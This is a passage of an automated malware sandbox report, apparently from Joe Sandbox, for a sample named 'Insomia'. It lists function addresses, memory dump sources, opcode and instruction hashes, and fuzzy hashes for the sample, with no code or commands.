Opcode ID: ff223ef11d06b959d019ec1b42238e556da6cab85c1fc4b367e1a177a9eb993a
Instruction ID: 3aeff2d2aecdab0c1e136f43093e52a3d7b6aff727a252da2c0a66c8d852d6a4
Opcode Fuzzy Hash: ff223ef11d06b959d019ec1b42238e556da6cab85c1fc4b367e1a177a9eb993a
Instruction Fuzzy Hash: AE129071E04249DFCB11CF68CC84AAEBBB1FF44318F19856AE905DB251D731E946CB92

Function 01B432A0 Relevance: .2, Instructions: 248COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2121198588.0000000001B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b40000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a174b48c9567909de7c11f81b0627f8546f6887a147f90510805f4f2e70ce7ae
Instruction ID: 98716d76c32b8d9184e83345df49a653553c2c26b6a3da6173a97ab468a52fe2
Opcode Fuzzy Hash: a174b48c9567909de7c11f81b0627f8546f6887a147f90510805f4f2e70ce7ae
Instruction Fuzzy Hash: 47918D74509394AFD7178BA4CD58F9A7FB5BF06301F1A41DAE240AB2B3C3759808DB62

Function 01B4329F Relevance: .2, Instructions: 246COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2121198588.0000000001B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 01B40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b40000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a0dc258e587516216fa3431c33fcf672bcb7b1eb276927477036818f50bd1ecb
Instruction ID: 2acf5d82579539c6a29d591bccaab85b732202e92aecbb4cb44247d6c690bb43
Opcode Fuzzy Hash: a0dc258e587516216fa3431c33fcf672bcb7b1eb276927477036818f50bd1ecb
Instruction Fuzzy Hash: 93918C74509394AFD7178BA4CD58F9A7FB5BF06301F1A41DAE240AB2B3C3758808DB62

Function 05E9F0F8 Relevance: .2, Instructions: 243COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130620245.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2db2d0ba7a1968974cd18494dab7054bdc1cde63015563bea8949bfcd146fee7
Instruction ID: ab23e52774e264d22feb951133c855be5ef081dc5bd9e872d59e23a22ce5fd15
Opcode Fuzzy Hash: 2db2d0ba7a1968974cd18494dab7054bdc1cde63015563bea8949bfcd146fee7
Instruction Fuzzy Hash: 02919A35B012049FDB0ADFA5D995AADBBB2FF88315F14806AE8A2D7391CB35DD01CB50

Function 05E99098 Relevance: .2, Instructions: 162COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130620245.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 245990d012c1e4f4811147f32a700bf8028f102ccb8340f5baf41426824fa5c8
Instruction ID: ae231bb4a15ac6848433537903a5b97fc62f13bfd3ea2555838b7f315ef5c656
Opcode Fuzzy Hash: 245990d012c1e4f4811147f32a700bf8028f102ccb8340f5baf41426824fa5c8
Instruction Fuzzy Hash: 2E710874E01218CFDB58DFA9D98869EBBB2FF88344F108129D84AA7388DB345D45CF91

Function 060CA980 Relevance: .2, Instructions: 156COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2131517121.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60c0000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc59b942323511b5a8f9f959092e3241931ad7493feab8f159ec10392fd2d991
Instruction ID: 259be6f295ed621420a71a90bd9627175f56239f5a6af3bdb292b7201c562314
Opcode Fuzzy Hash: dc59b942323511b5a8f9f959092e3241931ad7493feab8f159ec10392fd2d991
Instruction Fuzzy Hash: 3E51E170E8520CCFEB84CF98D489BEEBBF6FB49324F51802AD505A7251C7795A84CB91

Function 060CA970 Relevance: .2, Instructions: 154COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2131517121.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60c0000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b294874869eaa6ef28fdc988f99229e711a1730545f8b25e217e5b4162f8ab1
Instruction ID: 7e41ef1d6acb9a89b6f8efdf3aef78cea518da5522ee33a302de379913c0b650
Opcode Fuzzy Hash: 2b294874869eaa6ef28fdc988f99229e711a1730545f8b25e217e5b4162f8ab1
Instruction Fuzzy Hash: 8A510170E8520CCFEB84CFA8D4897EEBBF2FB49320F55802AD505A7291C7795985CB91

Function 05E99089 Relevance: .2, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130620245.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8488932b0adaf9877b91647e31f27a5b3ac084f28914d1b02f66249ae23de9b
Instruction ID: 72716d8d66577da3660b604ad90b4b64180f2c3492a55202203de59514d89ba4
Opcode Fuzzy Hash: f8488932b0adaf9877b91647e31f27a5b3ac084f28914d1b02f66249ae23de9b
Instruction Fuzzy Hash: DC61F674E01218CFDB58DFA9D98869EBBB2FF88344F508129E849A7348DB345D45CF91

Function 0633FB08 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2132319101.0000000006320000.00000040.00000800.00020000.00000000.sdmp, Offset: 06320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6320000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ccac73b374de13ad3e00c6fdb70b2ed97867bb8e4266ddcb58eb0d200b3e4722
Instruction ID: 4ec5a08542a1e0a0d8a0ba18aacbb2f40d822f6d2bfa06dc8b3b2694196383a7
Opcode Fuzzy Hash: ccac73b374de13ad3e00c6fdb70b2ed97867bb8e4266ddcb58eb0d200b3e4722
Instruction Fuzzy Hash: 7A51F3B4E00218DFDB44DFA9D594AAEBBB6FF88304F908029D405AB354DB389D85CF90

Function 060C66AB Relevance: .1, Instructions: 127COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2131517121.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60c0000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f506d08cd81582a4bca33db20b50fcd9e54de9385c4d10959a50e87bf6a8ff18
Instruction ID: bd4f93ea9fd17bfba1f0b7f034e4d16fc10717d4a156ee3832beec2773d84568
Opcode Fuzzy Hash: f506d08cd81582a4bca33db20b50fcd9e54de9385c4d10959a50e87bf6a8ff18
Instruction Fuzzy Hash: 8E512570E55648CFEBA0CF94C984B9DBFB1EF49314F1081AAC409A7254D77A5989CF41

Function 060C67E4 Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2131517121.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60c0000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 294d78ed21a1b4befe8f33b57872b0939fe916d35a21fe74f0a917c468dad9cc
Instruction ID: 2d04d4dd541cc89a3a3f7d4650d4836e1d8cd3f410198222a5308a4043b3556d
Opcode Fuzzy Hash: 294d78ed21a1b4befe8f33b57872b0939fe916d35a21fe74f0a917c468dad9cc
Instruction Fuzzy Hash: 355124B0E55608CFEBA4CF94C980BADBBB2FF49314F208169C009A7254DBB65D89CF41

Function 016D0B20 Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2120839769.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16d0000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 488bf72a36c425c7c32a04c541874088a75ecc6ca5e14f6129b31d92d644c23d
Instruction ID: 187f2bdfcdf15563c337508ce13a795b059a7accb79bce9cb98a18798b511e37
Opcode Fuzzy Hash: 488bf72a36c425c7c32a04c541874088a75ecc6ca5e14f6129b31d92d644c23d
Instruction Fuzzy Hash: 9841BC75E082099FEB10CF98CD54BBEBBB1EB48704F0084A2F105EB390C77689028BC2

Function 016D0B30 Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2120839769.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16d0000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d9378471f1c2acbea5e8e3744115b2a5f25d269150f33a8022086bc76bb05a1
Instruction ID: 330ab39fde3cf976460fb4aae4d3b860d5f02983010ca9913f57ab1dff732e5b
Opcode Fuzzy Hash: 2d9378471f1c2acbea5e8e3744115b2a5f25d269150f33a8022086bc76bb05a1
Instruction Fuzzy Hash: 9A41AA75E082199FEB10CF98DD44BBEBBB5EB48704F108562F505EB390CB7699428BD2

Function 05E9F598 Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130620245.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b230f885de6885c99d58bb6e505dce2442a33a855f2a153e765cd317239ab08
Instruction ID: 52aa6682e78bf51969131354cb15e35f3eb1e9f11c6dcfba258f301e35317640
Opcode Fuzzy Hash: 7b230f885de6885c99d58bb6e505dce2442a33a855f2a153e765cd317239ab08
Instruction Fuzzy Hash: 1F41E171A003158FDF09CFA8C841ABEBBB1FF84318F00812AD4A5E72A1D734D945CB91

Function 016D6077 Relevance: .1, Instructions: 95COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2120839769.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16d0000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 11f8250648e03444d74f52032ddc274f17071127d6bac774c84fc10decd02479
Instruction ID: 29e52ef3af577936512c2b2e233cb0351154d600fd839b0421edc74ff24ce6d1
Opcode Fuzzy Hash: 11f8250648e03444d74f52032ddc274f17071127d6bac774c84fc10decd02479
Instruction Fuzzy Hash: 9121D132B0C3429BEB728A7DDE4476B7BEAEB89355F08053AE446C3382EB65D445C311

Function 060CACE0 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2131517121.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60c0000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fdce6b8486787ced16ac7195b96372e94a0b66ab5d1f4e17145d14059c63e1e3
Instruction ID: d94d074444d32107f399aa7e2e96a27200460955117255d7712d71620ac60ebb
Opcode Fuzzy Hash: fdce6b8486787ced16ac7195b96372e94a0b66ab5d1f4e17145d14059c63e1e3
Instruction Fuzzy Hash: C4317874E4420ACFDB44DF98D5406EDBBB6FF88322F105229C816A7391D7789D85CBA1

Function 05E99DF0 Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130620245.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 820927a22194c3b6f6df065552a73538cca3e4ccffccde34ef18ea5964beb8b7
Instruction ID: 7775d8eff297139995a656d1d3f9b09d9a693724b771c62216a81c74c498b27f
Opcode Fuzzy Hash: 820927a22194c3b6f6df065552a73538cca3e4ccffccde34ef18ea5964beb8b7
Instruction Fuzzy Hash: EF31EF70E052089BDF08DFAAD844AEEBBF2BB88310F10A02DE559B3251D7745A44CFA1

Function 05E99DDF Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130620245.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bbd6633dddcabb0d125dd3e01f238e4add2e9157c3470215578327d404327987
Instruction ID: 15bf20caa090e12c29f2dee69f68528b535575a9bf010ff1742a768e594d972a
Opcode Fuzzy Hash: bbd6633dddcabb0d125dd3e01f238e4add2e9157c3470215578327d404327987
Instruction Fuzzy Hash: 5831DF75E052089FDF08DFAAD980AEEBBF2BB89300F10A02EE454B3251D7745A45CF61

Function 05E9B801 Relevance: .1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130620245.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b57d4db7e2872671bc796c170aebe38c3e8d09168717a4e7730e5b4e5ee21aa4
Instruction ID: ede8e34e8b7ec0411ac11518e1deca8948ec5f144fe9037952e8beac19a96442
Opcode Fuzzy Hash: b57d4db7e2872671bc796c170aebe38c3e8d09168717a4e7730e5b4e5ee21aa4
Instruction Fuzzy Hash: E6313474E08208CFDB18DFAAD4846EEBBF6FB8C304F50A0A9D455A7354EB745941CB91

Function 05E9B810 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130620245.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 56c49d9b69a7d5624b6f761110dff023da7af1e626bd1068e2390ee9d8c336cc
Instruction ID: cc56ef7c86e1e494727cb5a5aa475656f27d758e439e973cc7220880e675b166
Opcode Fuzzy Hash: 56c49d9b69a7d5624b6f761110dff023da7af1e626bd1068e2390ee9d8c336cc
Instruction Fuzzy Hash: 3B311574E08208CFDB18DFAAD4406EEBBFAFB8D304F50A0A9D419A7354DB745941CB90

Function 05E9AA01 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130620245.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f828a46bf2dfd453f484b8941d107c5c52c8a1f49106cedaa3f62e28644c4dd
Instruction ID: 7b62e44a6b829063f70848bb259068ec3f417c0656bf217b6cee81a60c580c48
Opcode Fuzzy Hash: 6f828a46bf2dfd453f484b8941d107c5c52c8a1f49106cedaa3f62e28644c4dd
Instruction Fuzzy Hash: F8312574E05218CFDB28CF54CA44BE9B7B2FF89304F10A069D489A7640EBB46D81CF02

Function 060C7970 Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2131517121.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60c0000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e040347cc7bafad50d540d83914a514853232d200f583c44e35870668399cf2
Instruction ID: e27a45876c3ec0da3ce60afd26b53616524cda72cb9f1b0f54397330e1cd1ecd
Opcode Fuzzy Hash: 3e040347cc7bafad50d540d83914a514853232d200f583c44e35870668399cf2
Instruction Fuzzy Hash: 2C316970D44248DFDB95DFA8D8847ECBFF1EB85320F6485AAC41AA7291D7798A81CF40

Function 060C8AF2 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2131517121.00000000060C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_60c0000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f0f06f75617eb2b79a2329c966e2765a29af6bfd59e7d4eb7f0a5d35392e23f5
Instruction ID: 17f53074f9d612cb74b17553e077753e65c09a958847bf965b92e9dff99158be
Opcode Fuzzy Hash: f0f06f75617eb2b79a2329c966e2765a29af6bfd59e7d4eb7f0a5d35392e23f5
Instruction Fuzzy Hash: C5410334A45218CFEBA4DF14D984B9ABBB2FB85314F1080E9D509A7644E7785EC0CF44

Function 0633FE08 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2132319101.0000000006320000.00000040.00000800.00020000.00000000.sdmp, Offset: 06320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6320000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bce6ea6382545cb16d9016c5e9147684aed4b6f0d5c38d8c83e8ac6759bb1f5
Instruction ID: 681a97bd914f20e5039aa3be2156b438e59bed44b107ac9c3a6b018834c1a319
Opcode Fuzzy Hash: 6bce6ea6382545cb16d9016c5e9147684aed4b6f0d5c38d8c83e8ac6759bb1f5
Instruction Fuzzy Hash: DF21F531A043488FC752DB79981409EBFF6EFC5200B1485AED48AC3741DE309904C792

Function 0167D4CC Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2120700031.000000000167D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0167D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_167d000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ac700b06576c6a5f3b06c289547997d490d8bec5192b90a26995bbb273153179
Instruction ID: c0c9ded231fa39e11be065a95ceef287fe1768f228657337661cb2fc056f39e4
Opcode Fuzzy Hash: ac700b06576c6a5f3b06c289547997d490d8bec5192b90a26995bbb273153179
Instruction Fuzzy Hash: 6321D6B1504244EFEB05DF58D9C0B26BF65FF98324F24C969D9090A356C336D456CAA1

Function 0168D01C Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2120726056.000000000168D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0168D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_168d000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a3a0a1947e7c9ba38a51e1ab080f98fe3f74d9364b9232942e5852b8f4582f1
Instruction ID: c5496d0a2cd57f54447fab0bebcbadb995884e03f77c9f6b4ed3650cb2ec1176
Opcode Fuzzy Hash: 5a3a0a1947e7c9ba38a51e1ab080f98fe3f74d9364b9232942e5852b8f4582f1
Instruction Fuzzy Hash: F8210071504244DFCB15EF58DD84B26BF65FB88364F208669E9094B386C33AD40BCAB2

Function 016D7090 Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2120839769.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16d0000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b8069fe58c10b34e0f1559d421540d9aa1d7acef3881072edea399bd45c53a6
Instruction ID: 17da4b4c49b25f683bdb7ecf5d90c805f6c21262353d480132b8e6ab2f214be6
Opcode Fuzzy Hash: 3b8069fe58c10b34e0f1559d421540d9aa1d7acef3881072edea399bd45c53a6
Instruction Fuzzy Hash: 1421D4305467099FCB549F24CD47599BBB6FF42A20B04C6AED8484A561D630AD12C741

Function 016D5110 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2120839769.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16d0000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5cb49441074457956ab7e9243374c7908c92010bee2dbebe47e28a2be063f23
Instruction ID: ac6a85f7d35362e5147fa2942f7f9bbd276d9ba2d5dd305996cdfaa805f43752
Opcode Fuzzy Hash: c5cb49441074457956ab7e9243374c7908c92010bee2dbebe47e28a2be063f23
Instruction Fuzzy Hash: E5215B30B002018FEB25DE3CCE54B6A7BB6EB94306F144469D8039BBA5EB75DC42CB81

Function 05EE5DF8 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130815785.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ee0000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57a8af3a6360f21eaf26373ffd1f5c47836662ca801fcb0a52a5f87a3a49e8cd
Instruction ID: 06755aebfee5f934e9bb2be5bbc9237012738d9d68c9b785dddc380e22008adb
Opcode Fuzzy Hash: 57a8af3a6360f21eaf26373ffd1f5c47836662ca801fcb0a52a5f87a3a49e8cd
Instruction Fuzzy Hash: 28213974E14209CFDB24CFA6D5442EEBBB2FF88315F14902AD405B2264EB740A44CFA1

Function 05E9E170 Relevance: .1, Instructions: 71COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130620245.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36c251442e0dc8ec82401bff4ed7dc627d72b3c969de47c965ffbbc7320a4b03
Instruction ID: 1caada8ebb2e86d9b65ced851602d542a8edaaae8b4a3ace4fbb91a044dc5c61
Opcode Fuzzy Hash: 36c251442e0dc8ec82401bff4ed7dc627d72b3c969de47c965ffbbc7320a4b03
Instruction Fuzzy Hash: 74219F35A042089FCF04CF69C848ADEBFB6EF8C324F149229E515A7390DE719845CB90

Function 016D5008 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2120839769.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16d0000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63269c17147d2fff96bc3fa120b620b90c9888326c1cf4c0d9bbba56b80f47c9
Instruction ID: bd54a81f9709e499f6be34443b28d5271e21e0d0c24887ce073a7ee3b3e930ac
Opcode Fuzzy Hash: 63269c17147d2fff96bc3fa120b620b90c9888326c1cf4c0d9bbba56b80f47c9
Instruction Fuzzy Hash: 94218170E052819FF7169B7CAC5C6653BA2EBC5204F4984E6D406C7676EF39DC02CB51

Function 05EE5E08 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130815785.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ee0000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35101a2a63b063d806af806ae9cccf2f8cca0ea3ebe69fe01b4524aa5f805d91
Instruction ID: 8b2cd2ca18f4108c1835e44db7384785dd988199e00bdfee4f3305a2c115f750
Opcode Fuzzy Hash: 35101a2a63b063d806af806ae9cccf2f8cca0ea3ebe69fe01b4524aa5f805d91
Instruction Fuzzy Hash: B3213A70D15209CFDB24CFAAD4446EEBBB6FF89315F14902AD005B3254EB740A44CFA1

Function 05EEE640 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130815785.0000000005EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5ee0000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e0d5b3a9d31cc5259266b38d14be12e2ed22333a4399c53c49493104dd3a718
Instruction ID: 3e42f1021b4bb93eec193878e593dde4f5b0572f497fd963e2a229c27ad561af
Opcode Fuzzy Hash: 9e0d5b3a9d31cc5259266b38d14be12e2ed22333a4399c53c49493104dd3a718
Instruction Fuzzy Hash: 9E2148B0E1420ADFDB14DFA9C0806BEBBBAFB49305F50D5A9D855A3340D7349A81CF91

Function 016D8B90 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2120839769.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16d0000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 157f067a8c7932339c5570fb23bb487c3e2986c48e71835756c6ed7ebe8e9041
Instruction ID: dc4d1708c95b8620c4e5bb19b7dc5387c5a86945149732cdcb50f0a3d9c2aab4
Opcode Fuzzy Hash: 157f067a8c7932339c5570fb23bb487c3e2986c48e71835756c6ed7ebe8e9041
Instruction Fuzzy Hash: F62114B4D08208EFDB00EFA9D8487AEBBF5EF49305F1094AAD006A3241DB744A85CB51

Function 063282F1 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2132319101.0000000006320000.00000040.00000800.00020000.00000000.sdmp, Offset: 06320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6320000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff29fd01e056cdd69cb7a572a13322b97bec3a711efe6d4d25e79522f9ff9871
Instruction ID: 90cb624734a6f348af09d4b10c44a45208ba2b9138f33d2afdc24f326b24b8d6
Opcode Fuzzy Hash: ff29fd01e056cdd69cb7a572a13322b97bec3a711efe6d4d25e79522f9ff9871
Instruction Fuzzy Hash: 4B311CB8A00229CFCB64CF18C888A8ABBF5FF49304F1040E9D649A7355DB349E80CF55

Function 05E9F7AC Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2130620245.0000000005E90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5e90000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a252a30fe6350ff4e059bc9d2966a75f09ecafc66321aeec84af5ba7bbbd88f3
Instruction ID: 0c4a6c9917c806af58713df563dd2102be8bca6a71d3e2390b1cf1943c4ed27a
Opcode Fuzzy Hash: a252a30fe6350ff4e059bc9d2966a75f09ecafc66321aeec84af5ba7bbbd88f3
Instruction Fuzzy Hash: AB113436A182845FEB59CFA8D040AD9BFF0AB10324F2880ABE4E4D72A1E635D581C310

Function 016D4EE1 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2120839769.00000000016D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 016D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_16d0000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5c1a183d2ad415f2aa4f2bb870744ac3840e9a1ae9b662a6da94bbb6be8ae144
Instruction ID: 15bfb82ddc94269298c5a38d3b3855e6182571f8c3b59f630f8d0e4702106eb4
Opcode Fuzzy Hash: 5c1a183d2ad415f2aa4f2bb870744ac3840e9a1ae9b662a6da94bbb6be8ae144
Instruction Fuzzy Hash: DC115130E041418FF7268B7CAC5CA253BA2E7D5244F4988E5D806CB675EF39DC45CB41

Function 0168D006 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2120726056.000000000168D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0168D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_168d000_Insomia.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7d00f0dbd94d0fd08dc3c6d6d2cd94aec664620ccfab83ca62b8ed356f2926d
Instruction ID: 9d4af2c6a274fcce68e50c35d4217af5ba6387a939f43328175f7cf348572dd0
Opcode Fuzzy Hash: a7d00f0dbd94d0fd08dc3c6d6d2cd94aec664620ccfab83ca62b8ed356f2926d
